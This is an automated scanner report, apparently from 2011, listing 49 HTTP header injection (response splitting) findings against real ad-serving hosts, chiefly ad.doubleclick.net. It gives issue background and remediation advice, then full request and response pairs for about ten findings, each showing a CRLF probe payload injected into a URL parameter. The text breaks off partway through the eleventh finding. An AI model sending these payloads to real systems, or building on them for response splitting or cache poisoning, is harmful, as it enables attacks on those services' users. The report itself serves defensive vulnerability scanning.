CWE-113, HTTP Header Injection, HTTP Response Splitting, DORK Report

CWE-113: Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Response Splitting')

Report generated by CloudScan Vulnerability Crawler at Mon Feb 14 08:59:33 CST 2011.

1. HTTP header injection

1.1. http://ad.doubleclick.net/activity [REST URL parameter 1]

1.2. http://ad.doubleclick.net/ad/N2724.UndertoneNetwork/B4504763.26 [REST URL parameter 1]

1.3. http://ad.doubleclick.net/ad/N3867.ContextWeb/B5127624.18 [REST URL parameter 1]

1.4. http://ad.doubleclick.net/ad/N6457.4298.ADVERTISING.COM/B4840137.15 [REST URL parameter 1]

1.5. http://ad.doubleclick.net/ad/cm.dailymail/ron_052010 [REST URL parameter 1]

1.6. http://ad.doubleclick.net/adi/N1558.Media6/B3897970.7 [REST URL parameter 1]

1.7. http://ad.doubleclick.net/adi/N2724.Specific_Media/B4323655.35 [REST URL parameter 1]

1.8. http://ad.doubleclick.net/adi/N3285.usatoday/B2343920.27 [REST URL parameter 1]

1.9. http://ad.doubleclick.net/adi/N3740.270604.B3/B5123509.61 [REST URL parameter 1]

1.10. http://ad.doubleclick.net/adi/N4270.Media6Degrees.com/B5094437.9 [REST URL parameter 1]

1.11. http://ad.doubleclick.net/adi/N4270.Tribal_Fusion/B5094437.2 [REST URL parameter 1]

1.12. http://ad.doubleclick.net/adi/N4319.msn/B2087123.383 [REST URL parameter 1]

1.13. http://ad.doubleclick.net/adi/N5367.3630.247REALMEDIAINC.1/B4475978.2 [REST URL parameter 1]

1.14. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_intelligentinvestor [REST URL parameter 1]

1.15. http://ad.doubleclick.net/adi/interactive.wsj.com/personalfinance_newsreel [REST URL parameter 1]

1.16. http://ad.doubleclick.net/adj/N3340.trfu/B4677841.11 [REST URL parameter 1]

1.17. http://ad.doubleclick.net/adj/N3340.trfu/B4677841.16 [REST URL parameter 1]

1.18. http://ad.doubleclick.net/adj/N3340.trfu/B4677841.2 [REST URL parameter 1]

1.19. http://ad.doubleclick.net/adj/N3340.trfu/B4677841.38 [REST URL parameter 1]

1.20. http://ad.doubleclick.net/adj/N4233.RSI/B4932906.5 [REST URL parameter 1]

1.21. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [REST URL parameter 1]

1.22. http://ad.doubleclick.net/adj/N5506.aol1/B5070033.19 [REST URL parameter 1]

1.23. http://ad.doubleclick.net/adj/N5506.aol1/B5070033.20 [REST URL parameter 1]

1.24. http://ad.doubleclick.net/adj/N5506.aol1/B5070033.21 [REST URL parameter 1]

1.25. http://ad.doubleclick.net/adj/N5798.133090.8212946998421/B3792881.193 [REST URL parameter 1]

1.26. http://ad.doubleclick.net/adj/N6046.134363.2043285697521/B5118749.2 [REST URL parameter 1]

1.27. http://ad.doubleclick.net/adj/N6092.AOL/B5108587.3 [REST URL parameter 1]

1.28. http://ad.doubleclick.net/adj/cm.drudgerep/ [REST URL parameter 1]

1.29. http://ad.doubleclick.net/adj/drudgereport.ilm/remnant [REST URL parameter 1]

1.30. http://ad.doubleclick.net/adj/pmv.inm.ind/news_home [REST URL parameter 1]

1.31. http://ad.doubleclick.net/adj/resn.173878/ [REST URL parameter 1]

1.32. http://ad.doubleclick.net/adj/uk.reuters/news/lifestyle/article [REST URL parameter 1]

1.33. http://ad.doubleclick.net/adj/wpni.politics [REST URL parameter 1]

1.34. http://ad.doubleclick.net/adj/wpni.politics/inlinead [REST URL parameter 1]

1.35. http://amch.questionmarket.com/adscgen/sta.php [code parameter]

1.36. http://amch.questionmarket.com/adscgen/sta.php [name of an arbitrarily supplied request parameter]

1.37. http://bidder.mathtag.com/notify [exch parameter]

1.38. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]

1.39. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter]

1.40. http://c7.zedo.com/utils/ecSet.js [v parameter]

1.41. http://d.adroll.com/pixel/DBLH4FNWEJG3HHKBYW3CFN/LJ7DC3I6ENDUDJRX7PVZRX [REST URL parameter 2]

1.42. http://d.adroll.com/pixel/DBLH4FNWEJG3HHKBYW3CFN/LJ7DC3I6ENDUDJRX7PVZRX [REST URL parameter 3]

1.43. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter]

1.44. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [$ parameter]

1.45. http://dw.com.com/clear/c.gif [REST URL parameter 2]

1.46. http://live.activeconversion.com/webtracker/track2.html [avc parameter]

1.47. http://tacoda.at.atwola.com/rtx/r.js [N cookie]

1.48. http://tacoda.at.atwola.com/rtx/r.js [si parameter]

1.49. http://w55c.net/m.gif [rurl parameter]



1. HTTP header injection
There are 49 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


1.1. http://ad.doubleclick.net/activity [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /activity

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 5c9c1%0d%0a579cb4ff136 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /5c9c1%0d%0a579cb4ff136;dc_pixel_url=resn.bfppixel;dc_seg=111918;ord=9544611894525588? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=794;c=529/16;s=5;d=9;w=300;h=250
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/5c9c1
579cb4ff136
;dc_pixel_url=resn.bfppixel;dc_seg=111918;ord=9544611894525588:
Date: Mon, 14 Feb 2011 01:37:44 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.2. http://ad.doubleclick.net/ad/N2724.UndertoneNetwork/B4504763.26 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N2724.UndertoneNetwork/B4504763.26

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 1e8e4%0d%0a2fefa587c7c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /1e8e4%0d%0a2fefa587c7c/N2724.UndertoneNetwork/B4504763.26;sz=160x600;pc=[TPAS_ID];ord=1297647406285? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356659/Bottom-injection-British-girl-watched-U-S-drugs-agents.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/1e8e4
2fefa587c7c
/N2724.UndertoneNetwork/B4504763.26;sz=160x600;pc=[TPAS_ID];ord=1297647406285:
Date: Mon, 14 Feb 2011 01:38:05 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.3. http://ad.doubleclick.net/ad/N3867.ContextWeb/B5127624.18 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N3867.ContextWeb/B5127624.18

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7d3d7%0d%0acda025163d8 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7d3d7%0d%0acda025163d8/N3867.ContextWeb/B5127624.18;sz=1x1;pc=53910;ord=1297647394261 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://syndicated.mondominishows.com/custom/vertical600iframe.php?pubsite_id=15009&pr=15246
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/7d3d7
cda025163d8
/N3867.ContextWeb/B5127624.18;sz=1x1;pc=53910;ord=1297647394261:
Date: Mon, 14 Feb 2011 01:40:09 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.4. http://ad.doubleclick.net/ad/N6457.4298.ADVERTISING.COM/B4840137.15 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N6457.4298.ADVERTISING.COM/B4840137.15

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2ef38%0d%0a0fd2405f6d4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2ef38%0d%0a0fd2405f6d4/N6457.4298.ADVERTISING.COM/B4840137.15;sz=1x1;ord=3034110126? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2ef38
0fd2405f6d4
/N6457.4298.ADVERTISING.COM/B4840137.15;sz=1x1;ord=3034110126:
Date: Mon, 14 Feb 2011 01:40:24 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.5. http://ad.doubleclick.net/ad/cm.dailymail/ron_052010 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/cm.dailymail/ron_052010

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 49ace%0d%0a79cce659e85 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /49ace%0d%0a79cce659e85/cm.dailymail/ron_052010;net=cm;u=,cm-41374895_1297647368,11d765b6a10b1b3,none,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.rdst11-cm.rdst12-cm.polit_h-cm.music_h-cm.sports_h-cm.weath_l-cm.shop_h-cm.tech_h-cm.ent_h-bk.rdst1-mm.aa5-mm.ad1-mm.af1-mm.ai1-mm.al5-mm.am5-mm.ar1-mm.as1-mm.au1-mm.da1-an.51-an.5-ex.32-ex.76-ex.49-dx.16-qc.a;;sz=300x250;contx=none;dc=w;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.rdst11;btg=cm.rdst12;btg=cm.polit_h;btg=cm.music_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.shop_h;btg=cm.tech_h;btg=cm.ent_h;btg=bk.rdst1;btg=mm.aa5;btg=mm.ad1;btg=mm.af1;btg=mm.ai1;btg=mm.al5;btg=mm.am5;btg=mm.ar1;btg=mm.as1;btg=mm.au1;btg=mm.da1;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=ex.49;btg=dx.16;btg=qc.a;ord=3461791? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/49ace
79cce659e85
/cm.dailymail/ron_052010;net=cm;u=,cm-41374895_1297647368,11d765b6a10b1b3,none,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.rdst11-cm.rdst12-cm.polit_h-cm.music_h-cm.sports_h-cm.weath_l-cm.shop_h-cm.tech_h-cm.ent_h-bk.rdst1-mm.aa5-mm.ad1-mm.af1-m:
Date: Mon, 14 Feb 2011 01:38:04 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.6. http://ad.doubleclick.net/adi/N1558.Media6/B3897970.7 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1558.Media6/B3897970.7

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 547d9%0d%0aaddfa21ea08 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /547d9%0d%0aaddfa21ea08/N1558.Media6/B3897970.7;sz=300x250;click0=http://ad.media6degrees.com/adserv/clk?tId=4071663510365101|cId=3210|cb=1297647330|notifyPort=8080|exId=19|tId=4071663510365101|ec=1|secId=194|price=0.3381000030040741|pubId=562|advId=971|notifyServer=asd147.sd.pl.pvt|spId=27355|adType=iframe|invId=3099|bid=1.61|ctrack=;ord=1297647331695? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.media6degrees.com/adserv/cs?tId=4071663510365101|cb=1297647330|adType=iframe|cId=3210|ec=1|spId=27355|advId=971|exId=19|price=0.3381000030040741|pubId=562|secId=194|invId=3099|notifyServer=asd147.sd.pl.pvt|notifyPort=8080|bid=1.61|srcUrlEnc=http%3A%2F%2Fwww.dailymail.co.uk%2Fnews%2Farticle-1356403%2FNHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/547d9
addfa21ea08
/N1558.Media6/B3897970.7;sz=300x250;click0=http: //ad.media6degrees.com/adserv/clk
Date: Mon, 14 Feb 2011 01:36:43 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.7. http://ad.doubleclick.net/adi/N2724.Specific_Media/B4323655.35 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2724.Specific_Media/B4323655.35

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8c5f7%0d%0a4e3b8886cbe was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8c5f7%0d%0a4e3b8886cbe/N2724.Specific_Media/B4323655.35;sz=300x250;;id=CY;type=d;data=camry;pc=[TPAS_ID];click=http://ads.specificmedia.com/click/v=5%3Bm=2%3Bl=5434%3Bc=123869%3Bb=785306%3Bp=ui%3DuosDj9Liw_xRTA%3Btr%3DGdDAFShDwEH%3Btm%3D0-0%3Bts=20110213203406%3Bdct=;ord=20110213203406? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ads.specificmedia.com/serve/v=5;m=3;l=5434;c=123869;b=785306;ts=20110213203406;p=ui%3DuosDj9Liw_xRTA%3Btr%3DGdDAFShDwEH%3Btm%3D0-0;cxt=99002376:2166629-99002135:2165456-99013532:2161575
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/8c5f7
4e3b8886cbe
/N2724.Specific_Media/B4323655.35;sz=300x250;;id=CY;type=d;data=camry;pc=[TPAS_ID];click=http: //ads.specificmedia.com/click/v=5;m=2;l=5434;c=123869;b=785306;p=ui=uosDj9Liw_xRTA;tr=GdDAFShDwEH;tm=0-0;ts=20110213203406;dct=;ord=20110213203406
Date: Mon, 14 Feb 2011 01:34:16 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.8. http://ad.doubleclick.net/adi/N3285.usatoday/B2343920.27 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.usatoday/B2343920.27

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 15b01%0d%0a972348252b4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /15b01%0d%0a972348252b4/N3285.usatoday/B2343920.27;sz=728x90;click=http%3A//gannett.gcion.com/adlink%2F5111%2F221898%2F0%2F225%2FAdId%3D1449317%3BBnId%3D1%3Bitime%3D647327658%3Bkey%3DDaniels%2Bat%2BCPAC%2Bcalls%2Bbroad%2Bcivil%2Bconservative%2Bcoalition%2Blaquo%2BDes%2BMoines%2BRegister%2BStaff%2BBlogs%3Blink%3D;ord=647327658? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/15b01
972348252b4
/N3285.usatoday/B2343920.27;sz=728x90;click=http: //gannett.gcion.com/adlink/5111/221898/0/225/AdId=1449317;BnId=1;itime=647327658;key=Daniels+at+CPAC+calls+broad+civil+conservative+coalition+laquo+Des+Moines+Register+Staff+Blogs;link=;ord=647327658
Date: Mon, 14 Feb 2011 01:36:20 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.9. http://ad.doubleclick.net/adi/N3740.270604.B3/B5123509.61 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3740.270604.B3/B5123509.61

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8d6f8%0d%0a603205b847e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8d6f8%0d%0a603205b847e/N3740.270604.B3/B5123509.61;sz=728x90;pc=[TPAS_ID];ord=1297647300104;click=http://a.rfihub.com/aci/124_0_YWE9MTU3MDUsNzM0MzMsMTQxMjEsNjgwODYsMTI0MywxNDk0MSxjeVk4UkM5UTJ5TVAscCw3NzYsMjk0NiwzMjk4MSwxODc5LDc3OTImcmI9NDQ1JnJlPTE5OTY5 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=6473367370.8131766689475626&rb=445&ca=&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre647336735316&pb=&pc=&pd=&pg=&ct=1297647336737&pe=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&pf=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/8d6f8
603205b847e
/N3740.270604.B3/B5123509.61;sz=728x90;pc=[TPAS_ID];ord=1297647300104;click=http: //a.rfihub.com/aci/124_0_YWE9MTU3MDUsNzM0MzMsMTQxMjEsNjgwODYsMTI0MywxNDk0MSxjeVk4UkM5UTJ5TVAscCw3NzYsMjk0NiwzMjk4MSwxODc5LDc3OTImcmI9NDQ1JnJlPTE5OTY5
Date: Mon, 14 Feb 2011 01:36:09 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.10. http://ad.doubleclick.net/adi/N4270.Media6Degrees.com/B5094437.9 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4270.Media6Degrees.com/B5094437.9

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 66666%0d%0abd96a1a83dd was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /66666%0d%0abd96a1a83dd/N4270.Media6Degrees.com/B5094437.9;sz=300x250;ord=1297649785346;click0=http://ad.media6degrees.com/adserv/clk?tId=4401087500065260|cId=5193|cb=1297649784|notifyPort=8080|exId=23|tId=4401087500065260|ec=1|secId=859|price=AAABLiH0WMa4m9TZK-nhGAJNtNF-bSex1RpF1w|pubId=300|advId=891|notifyServer=asd116.sd.pl.pvt|spId=26917|adType=iframe|invId=3159|bid=1.53|ctrack=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLzQ3CMAwG0I9fReoaXC01rlM3Q3DgxtVN7BkYo1sxDhITUN79DTgAuInzOvMk1EYeSbxnqqsUWqo3iwhW14Tj_bm9Bpz-YzIu2jLTomb7qEwWcyYX7UWYe419nAHlhAvwfSRcgfcHP_GHBIVzAAAA%26dst%3Dhttp%253A%252F%252Fwww.adobe.com%252Fproducts%252Fcreativesuite%252Fdesign%252F%253Fsdid%253DIEFXK HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.media6degrees.com/adserv/cs?tId=4401087500065260|cb=1297649784|adType=iframe|cId=5193|ec=1|spId=26917|advId=891|exId=23|price=AAABLiH0WMa4m9TZK-nhGAJNtNF-bSex1RpF1w|pubId=300|secId=859|invId=3159|notifyServer=asd116.sd.pl.pvt|notifyPort=8080|bid=1.53|srcUrlEnc=http%3A%2F%2Fwww.drudgereport.com%2F|ctrack=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLzQ3CMAwG0I9fReoaXC01rlM3Q3DgxtVN7BkYo1sxDhITUN79DTgAuInzOvMk1EYeSbxnqqsUWqo3iwhW14Tj_bm9Bpz-YzIu2jLTomb7qEwWcyYX7UWYe419nAHlhAvwfSRcgfcHP_GHBIVzAAAA%26dst%3Dhttp%253A%252F%252Fwww.adobe.com%252Fproducts%252Fcreativesuite%252Fdesign%252F%253Fsdid%253DIEFXK
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/66666
bd96a1a83dd
/N4270.Media6Degrees.com/B5094437.9;sz=300x250;ord=1297649785346;click0=http: //ad.media6degrees.com/adserv/clk
Date: Mon, 14 Feb 2011 02:17:02 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.11. http://ad.doubleclick.net/adi/N4270.Tribal_Fusion/B5094437.2 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4270.Tribal_Fusion/B5094437.2

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 1321c%0d%0a3e041b3a832 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

